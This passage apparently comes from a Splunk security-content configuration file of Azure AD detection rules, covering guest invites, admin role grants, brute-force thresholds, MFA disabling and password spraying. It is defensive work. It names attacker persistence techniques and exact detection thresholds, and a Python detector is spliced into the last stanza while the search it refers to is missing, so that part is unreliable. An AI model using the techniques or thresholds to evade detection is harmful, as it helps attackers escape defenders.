collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. 
An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities` action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities` action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Administrator may legitimately invite external guest users. Filter as needed. 
action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD External Guest User Invited - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = External Guest User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD External Guest User Invited - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. 
An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities` action.notable.param.rule_title = Azure AD External Guest User Invited action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Invite external user" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.type as type | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by type, initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_external_guest_user_invited_filter` [ESCU - Azure AD FullAccessAsApp Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the 'full_access_as_app' permission, marked by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is assigned to an application within Office 365 Exchange Online, identified by ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. This permission grants broad control over Office 365 operations, including full access to all mailboxes and the capability to send emails as any user. The query utilizes the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This monitoring is crucial for early detection of potential unauthorized access or data exfiltration, as the 'full_access_as_app' permission could lead to significant security incidents if exploited. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when the 'full_access_as_app' permission, marked by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is assigned to an application within Office 365 Exchange Online, identified by ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. This permission grants broad control over Office 365 operations, including full access to all mailboxes and the capability to send emails as any user. The query utilizes the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This monitoring is crucial for early detection of potential unauthorized access or data exfiltration, as the 'full_access_as_app' permission could lead to significant security incidents if exploited. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = The full_access_as_app API permission may be assigned to legitimate applications. Filter as needed. 
action.escu.creation_date = 2024-01-29 action.escu.modification_date = 2024-01-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD FullAccessAsApp Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = User $user$ assigned the full_access_as_app permission to the app registration $object$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD FullAccessAsApp Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when the 'full_access_as_app' permission, marked by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is assigned to an application within Office 365 Exchange Online, identified by ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. This permission grants broad control over Office 365 operations, including full access to all mailboxes and the capability to send emails as any user. The query utilizes the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. 
This monitoring is crucial for early detection of potential unauthorized access or data exfiltration, as the 'full_access_as_app' permission could lead to significant security incidents if exploited. action.notable.param.rule_title = Azure AD FullAccessAsApp Permission Assigned action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="Update application" | eval newvalue = mvindex('properties.targetResources{}.modifiedProperties{}.newValue',0) | spath input=newvalue | search "{}.ResourceAppId"="00000002-0000-0ff1-ce00-000000000000" "{}.RequiredAppPermissions{}.EntitlementId"="dc890d15-9560-4a4c-9b7f-a736ec74ec40" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_fullaccessasapp_permission_assigned_filter` [ESCU - Azure AD Global Administrator Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Administrators may legitimately assign the Global Administrator role to a user. Filter as needed. 
action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Global Administrator Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = Global Administrator Role assigned for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Global Administrator Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the Azure AD Global Administrator role to an Azure AD user. The Global Administrator role is the most powerful administrator role in Azure AD and provides almost unlimited access to data, resources and settings. It is equivalent to the Domain Administrator group in an Active Directory environment. 
While Azure AD roles do not grant access to Azure services and resources, it is possible for a Global Administrator account to gain control of Azure resources. Adversaries and red teams alike may assign this role to a compromised account to establish Persistence or escalate their privileges in an Azure AD environment. action.notable.param.rule_title = Azure AD Global Administrator Role Assigned action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add member to role" properties.targetResources{}.modifiedProperties{}.newValue="\"Global Administrator\"" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_global_administrator_role_assigned_filter` [ESCU - Azure AD High Number Of Failed Authentications For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Azure AD account with more than 20 failed authentication events in the span of 10 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Azure AD account with more than 20 failed authentication events in the span of 10 minutes. This behavior could represent a brute force attack against the account. 
As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = A user with more than 20 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD High Number Of Failed Authentications For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to authenticate more than 20 times in the span of 5 minutes. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD High Number Of Failed Authentications For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Azure AD account with more than 20 failed authentication events in the span of 10 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. 
action.notable.param.rule_title = Azure AD High Number Of Failed Authentications For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime values(src_ip) as src_ip by user | where count > 20 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_high_number_of_failed_authentications_for_user_filter` [ESCU - Azure AD High Number Of Failed Authentications From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 10 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 10 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. 
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = An Ip address with more than 20 failed authentication attempts in the span of 10 minutes may also be triggered by a broken application. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD High Number Of Failed Authentications From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = $src_ip$ failed to authenticate more than 20 times in the span of 10 minutes minutes. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD High Number Of Failed Authentications From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 10 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. 
action.notable.param.rule_title = Azure AD High Number Of Failed Authentications From Ip action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip | where count > 20 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_high_number_of_failed_authentications_from_ip_filter` [ESCU - Azure AD Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. 
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Legitimate use case may require for users to disable MFA. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = MFA disabled for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following 
analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = Azure AD Multi-Factor Authentication Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="Disable Strong Authentication" | rename properties.* as * | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime by user, type, operationName, initiatedBy, result | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multi_factor_authentication_disabled_filter` [ESCU - Azure AD Multi-Source Failed Authentications Spike - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects potential distributed password spraying attacks within an Azure AD environment. It identifies a notable increase in failed authentication attempts across a variety of unique user-and-IP address combinations, originating from multiple source IP addresses and countries, and employing different user agents. Such patterns suggest an adversary's attempt to bypass security controls by using a range of IP addresses to test commonly used passwords against numerous user accounts. The detection scrutinizes SignInLogs from Azure AD logs, particularly focusing on events with error code 50126, which signals a failed authentication due to incorrect credentials. 
By collating data over a five-minute interval, the analytic computes the distinct counts of user-and-IP combinations, unique users, source IPs, user agents, and countries. It then applies a set of thresholds to these metrics to pinpoint unusual activities that could indicate a coordinated attack effort. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Recognizing this behavior is vital for security operations centers (SOCs) as distributed password spraying represents a more complex form of traditional password spraying. Attackers distribute the source of their attempts to evade detection mechanisms that typically monitor for single-source IP anomalies. Prompt detection of such distributed activities is essential to thwart unauthorized access attempts, prevent account compromises, and mitigate the risk of further malicious activities within the organization's network. A true positive alert from this analytic suggests an active distributed password spraying attack against the organization's Azure AD tenant. A successful attack could result in unauthorized access, particularly to accounts with elevated privileges, leading to data breaches, privilege escalation, persistent threats, and lateral movement within the organization's infrastructure.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic detects potential distributed password spraying attacks within an Azure AD environment. It identifies a notable increase in failed authentication attempts across a variety of unique user-and-IP address combinations, originating from multiple source IP addresses and countries while sharing a single user agent.
Such patterns suggest an adversary's attempt to bypass security controls by using a range of IP addresses to test commonly used passwords against numerous user accounts. The detection scrutinizes SignInLogs from Azure AD logs, particularly focusing on events with error code 50126, which signals a failed authentication due to incorrect credentials. By collating data over a five-minute interval, the analytic computes the distinct counts of user-and-IP combinations, unique users, source IPs, user agents, and countries. It then applies a set of thresholds to these metrics to pinpoint unusual activities that could indicate a coordinated attack effort. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Recognizing this behavior is vital for security operations centers (SOCs) as distributed password spraying represents a more complex form of traditional password spraying. Attackers distribute the source of their attempts to evade detection mechanisms that typically monitor for single-source IP anomalies. Prompt detection of such distributed activities is essential to thwart unauthorized access attempts, prevent account compromises, and mitigate the risk of further malicious activities within the organization's network. A true positive alert from this analytic suggests an active distributed password spraying attack against the organization's Azure AD tenant. A successful attack could result in unauthorized access, particularly to accounts with elevated privileges, leading to data breaches, privilege escalation, persistent threats, and lateral movement within the organization's infrastructure.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details).
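The Multi-Source Failed Authentications Spike logic described above (and implemented by the `search` later in this stanza) reduces to four steps: keep 50126 failures, bucket them into 5-minute windows, take distinct counts per window, and fire only when every threshold holds. The Python below is an added example written for this page, not Splunk Threat Research Team code. It re-implements that logic over constructed SignInLogs-style events; the flat field names `user`, `src_ip`, `user_agent` and `country` are assumptions that mirror the search's renamed `properties.*` fields (`country` stands in for `location.countryOrRegion`), and the sample users, IPs and user agents are invented. It generalizes slightly in that the thresholds are parameters, so the function can be tuned per tenant as the how_to_implement text recommends; the same bucket-then-distinct-count shape underlies the other threshold rules in this file.

```python
"""Added example: distributed password-spray detector mirroring the
Multi-Source Failed Authentications Spike search in this stanza.
Not Splunk code; the events below are constructed, not real tenant data."""
from collections import defaultdict
from datetime import datetime, timezone

AAD_INVALID_PASSWORD = 50126  # status.errorCode for a wrong-credential failure
SPAN = 5 * 60                 # bucket span=5m


def detect_spray(events, min_combos=20, min_users=20, min_ips=20, max_user_agents=1):
    """Return one finding per 5-minute bucket in which every threshold holds.

    Events are dicts with _time (epoch seconds), errorCode, succeeded, user,
    src_ip, user_agent and country (the search's location.countryOrRegion).
    Thresholds are parameters so they can be tuned per tenant; the search
    hard-codes > 20 / > 20 / > 20 and exactly one user agent, which for a
    non-empty bucket is the same as max_user_agents=1.
    """
    buckets = defaultdict(list)
    for e in events:
        if e["errorCode"] == AAD_INVALID_PASSWORD and e["succeeded"] is False:
            buckets[int(e["_time"]) // SPAN * SPAN].append(e)

    findings = []
    for start in sorted(buckets):
        evs = buckets[start]
        combos = {f'{e["src_ip"]}-{e["user"]}' for e in evs}  # eval uniqueIPUserCombo
        users = {e["user"] for e in evs}
        ips = {e["src_ip"] for e in evs}
        agents = {e["user_agent"] for e in evs}
        countries = {e["country"] for e in evs}
        if (len(combos) > min_combos and len(users) > min_users
                and len(ips) > min_ips and len(agents) <= max_user_agents):
            findings.append({
                "bucket": start,
                "firstTime": min(e["_time"] for e in evs),
                "lastTime": max(e["_time"] for e in evs),
                "count": len(evs),
                "uniqueIpUserCombinations": len(combos),
                "uniqueUsers": len(users),
                "uniqueIPs": len(ips),
                "uniqueUserAgents": len(agents),
                "uniqueCountries": len(countries),
                "users": sorted(users),
                "ips": sorted(ips),
            })
    return findings


def sample_events():
    """Constructed SignInLogs-style failures across three 5-minute buckets."""
    base = datetime(2024, 1, 15, 9, 0, tzinfo=timezone.utc).timestamp()

    def fail(offset, user, ip, ua, country):
        return dict(_time=base + offset, errorCode=AAD_INVALID_PASSWORD, succeeded=False,
                    user=user, src_ip=ip, user_agent=ua, country=country)

    events = []
    # 09:00 bucket: 25 users from 25 IPs in three countries, one scripted client -> spray
    for i in range(25):
        events.append(fail(i * 5, f"user{i:02d}@example.com", f"203.0.113.{i + 1}",
                           "python-requests/2.31", ("US", "DE", "BR")[i % 3]))
    # 09:10 bucket: same user/IP spread but three browsers -> uniqueUserAgents = 1 fails
    for i in range(25):
        events.append(fail(600 + i * 5, f"user{i:02d}@example.com", f"198.51.100.{i + 1}",
                           ("Chrome/120", "Firefox/121", "Edge/120")[i % 3], "US"))
    # 09:20 bucket: one user mistyping a password five times -> far below thresholds
    for i in range(5):
        events.append(fail(1200 + i * 10, "alice@example.com", "192.0.2.10", "Chrome/120", "US"))
    return events


if __name__ == "__main__":
    for f in detect_spray(sample_events()):
        when = datetime.fromtimestamp(f["bucket"], tz=timezone.utc).isoformat()
        print(f"{when}: {f['count']} failures, {f['uniqueUsers']} users, "
              f"{f['uniqueIPs']} IPs, {f['uniqueCountries']} countries, "
              f"{f['uniqueUserAgents']} user agent")
```

Only the first constructed bucket is reported. The second bucket has the same user and IP spread but three user agents, which is what the `uniqueUserAgents = 1` clause is there to suppress: spraying tools usually present one client string, whereas a crowd of real users behind rotating VPN or cloud egress addresses (the known_false_positives case) shows a mix. Raising `max_user_agents` trades that safeguard for recall.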
You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Security teams are encouraged to adjust these thresholds to optimize the balance between detecting genuine threats and minimizing false positives, ensuring the detection is tailored to their specific environment.
action.escu.known_false_positives = This detection may yield false positives in scenarios where legitimate bulk sign-in activities occur, such as during company-wide system updates or when users are accessing resources from varying locations in a short time frame, such as in the case of VPNs or cloud services that rotate IP addresses. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Multi-Source Failed Authentications Spike - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover", "NOBELIUM Group"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Multi-Source Failed Authentications Spike - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
